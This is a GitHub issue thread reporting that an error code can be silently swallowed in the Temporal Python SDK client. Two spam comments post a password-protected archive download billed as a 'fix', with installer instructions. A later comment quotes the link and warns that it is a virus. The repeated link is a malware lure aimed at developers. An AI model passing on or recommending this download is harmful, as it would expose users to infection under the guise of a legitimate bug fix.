### ISSUE TITLE
[Bug] RPCStatusCode.ALREADY_EXISTS can be swallowed

### ISSUE THREAD

**Issue by dandavison** [temporalio/sdk-python#624]
RPCStatusCode.ALREADY_EXISTS can be swallowed due to an unhandled branch of execution here:

https://github.com/temporalio/sdk-python/blob/927abdcf923a803da9cb7202c0dcd410561e6ef2/temporalio/client.py#L5086-L5093

**Comment by YoungAgile** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by YoungAgile** [comment]
> Download https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file password: changeme In the installer menu, select "gcc."

Virus, please do not click on the link
